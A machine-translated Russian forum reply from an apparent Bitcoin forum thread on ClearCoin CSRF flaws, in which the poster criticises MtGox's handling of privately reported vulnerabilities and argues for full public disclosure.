jrmithdobbs Сообщений: 59 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: ледокол от 20 июня 2011 года, 5:11:59 AM Это не так уж трудно: интервью сегодня (вы смотрели?) О обкатки доказали, что все люди, которые утверждали, что они знали причину грабежа MtGox ошибались. Это интервью не оказалось ничего, кроме того, что представитель по mtgox настоящего времени говорит, что некоторые вещи, не имеющие свидетельств, за их готовность сделать публичные заявления без получения юридической помощи первой, за исключением, и что они не понимают основные технические концепций. Учитывая их недавний опыт реагирования на (больше похоже: не реагирует на) в частном порядке, раскрытыми вопросы безопасности. (Потребовался * в неделе * для смокинга, чтобы ответить на кого-то пытается сообщить этот csrfs. Он только ответил, как только это было обнародовано. Это не было подтверждено пятницей. Это было подтверждено гораздо раньше, в течение неделе.) Проблемы, SQL-инъекции, которые были фиксируется в последние несколько дней на mtgox, без уведомления или раскрытия. И т.п. поведение Tux является то, что побудило меня раскрыть это, как я сделал. Я думаю, что в будущем все вопросы безопасности, связанные с Bitcoin должны получить полное лечение раскрытия, чтобы препятствовать другой mtgox. (Действительно жаль Гэвин. Я знаю, вы бы ответили правильно было это было в частном порядке раскрыта.)

« Предыдущая тема | Следующая тема »

Как заработать Биткоины?

Bitcoin Wallet * Portefeuille Bitcoin * Monedero Bitcoin * Carteira Bitcoin * Portafoglio Bitcoin * Bitcoin Cüzdan * 比特币钱包

bitcoin-zarabotat.ru
Почта для связи: bitcoin-zarabotat.ru@yandex.ru

3HmAQ9FkRFk6HZGuwExYxL62y7C1B9MwPW